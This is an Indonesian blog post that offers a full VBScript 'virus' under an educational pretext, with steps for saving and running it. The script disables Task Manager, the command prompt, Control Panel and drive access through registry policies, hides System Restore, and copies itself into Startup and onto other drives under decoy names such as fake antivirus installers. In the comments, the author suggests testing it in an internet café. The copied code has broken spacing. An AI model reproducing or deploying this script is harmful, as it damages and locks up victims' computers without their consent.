Contoh Script Virus Komputer

kali ini saya akan mengshare contoh script virus. lho kok script virus di share sih ? script virus ini saya sengaja di share agar kawan-kawan sekalian bisa mengetahui cara kerja virus dan cara mengatasinya. bukan hanya itu saja script ini saya share agar kawan-kawan juga mengetahui cara membuat virus ( hanya sebatas ilmu pengetahuan lho ) ok langsung aja berikut scriptnya.



On error resume next

Dim Regpen, FSO, Copier, Creator, Dupler, Deleter, Runner

set Regpen = CreateObject ("Wscript.Shell" )

set FSO = CreateObject ("Scripting. FileSystemObject ")

set Creator = FSO.CreateTextFile ("C:\Ternate. vbs", true)

Creator.WriteLine ("Msgbox ("& Chr (34) & "Salam Kenal dari Saya,

Mr.Dajjal :<" & chr (34)& ")")

Creator.Close


Regpen.RegWrite "HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\Curr

entVersion\Policies \System\NoRun" ,"1","REG_ DWORD"

Regpen.RegWrite "HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\Curr

entVersion\Policies \System\DisableT askMgr"," 1","RE G_DWORD"

Regpen.RegWrite "HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\Curr

entVersion\Policies \System\DisableC MD","1"," REG_DW ORD"

Regpen.RegWrite "HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\Curr

entVersion\Policies \Explorer\ NoFolderOption" ,"1"," REG_DWORD"

Regpen.RegWrite "HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\Curr

entVersion\Policies \Explorer\ NoDrives" ,"16","REG_ D WORD"

Regpen.RegWrite "HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\Curr

entVersion\Policies \Explorer\ NoSaveSettings" ,"1"," REG_DWORD"

Regpen.RegWrite "HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\Curr

entVersion\Policies \Explorer\ NoControlPanel" ,"1"," REG_DWORD"

Regpen.RegWrite "HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\Curr

entVersion\Policies \NoSetTaskbar" ,"1","REG_ DWORD"

Regpen.RegWrite "HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\Curr

entVersion\Policies \Explorer\ Advanced\ HideFileExt" ,"1","REG_DWORD"

Regpen.Regwrite "HKEY_LOCAL_ MACHINE\Software \Microsoft\ Windows\Cur

rentVersion\ Winlogon\ LegalNoticeCapti on", "THE Syaithan-X"

Regpen.RegWrite "HKEY_LOCAL_ MACHINE\Software \Microsoft\ Windows\Cur

rentVersion\ Winlogon\ LegalNoticeText" ,"ASSALAMUALA IKUM, YA AHLIL KUBUR"


Set Copier = FSO.GetFile ("C:\Ternate. vbs")

Copier.Copy ("C:\Documents and Settings\All Users\Start

Menu\Programs\ Startup\Adobe. vbs")


FSO.CreateFolder ("C:\Program Files\Microsoft 0ffice\0ffice12" )

FSO.CreateFolder ("D:\Program" )

FSO.CreateFolder ("E:\Program" )

FSO.CreateFolder ("F:\Program" )

FSO.CreateFolder ("G:\Program" )

FSO.CreateFolder ("H:\Program" )

FSO.CreateFolder ("I:\Program" )

FSO.CreateFolder ("J:\Program" )

FSO.CreateFolder ("K:\Program" )


Set Deleter = FSO.GetFile ("C:\Windows\ System32\ Restore\rstrui. exe")

Deleter.Move ("C:\Program Files\Microsoft 0ffice\0ffice12\ rstrui.Gnamu" )


set Dupler = FSO.GetFile (WScript.ScriptFull Name)

Dupler.Copy ("C:\Program Files\Microsof 0ffice\0ffice12\ Hantu.vbs" )

Dupler.Copy ("C:\Documents and Settings\All Users\Start

Menu\Programs\ Startup\Desktop. ini.vbs")

Dupler.Copy ("C:\Documents and Settings\All

Users\Desktop\ Dajjal_Antivirus .exe.vbs" )

Dupler.Copy ("C:\Windows\ System32\ Restore\rstrui. exe.vbs")

Dupler.Copy ("D:\Program\ MotoGP_SETUP. vbs")

Dupler.Copy ("E:\Program\ TuneUp2009_ SETUP.vbs" )

Dupler.Copy ("F:\Program\ Ansav_SETUP. vbs")

Dupler.Copy ("G:\Program\ DeltaForce_ SETUP.vbs" )

Dupler.Copy ("H:\Program\ DeltaForce_ SETUP.vbs" )

Dupler.Copy ("I:\Program\ Ansav_SETUP. vbs")

Dupler.Copy ("J:\Program\ Project.vbs" )

Dupler.Copy ("K:\Program\ Hantu.vbs" )



Set Runner = WScript.CreateObjec t ("WScript.Shell" )

Runner.Run ("C:\Program Files\Microsoft 0ffice\0ffice12\ Hantu.vbs" )



  1. masukan script diatas kedalam notepad
  2. save dengan nama yang anda inginkan ( jangan lupa belangkang ditambahkan .exe )
  3. selesai

NB : saya tidakakan bertanggung jawab dengan segala kerusakan yang ditimbulkan. karena ini hanya untuk ilmu pengetahuan semata, terima kasih

2 komentar:

Anonim mengatakan...

gimana dan kapan di pakainya,,??

Kumpulan Artikel mengatakan...

gimana : caranya gampang gan cukup copas script diatas ke notepad lalu save denagn nama seterah agan tapi iangan belangkang nama di beri tambahan (dot)exe . . .

kapan : seterah agan tapi ane saranin coba di warnet dulu . . .

Posting Komentar

SAYA SANGAT SENANG APABILA ANDA MEMBERIKAN KOMENTAR, KRITIK SERTA SARANNYA.

TERIMA KASIH BANYAK BUAT PARA PEMBACA & PENGUNJUNG SETIA.

 
Copyright © 2012. My Blog . All Rights Reserved | Design by Herdiansyah | modify by My Blog | Mobile Version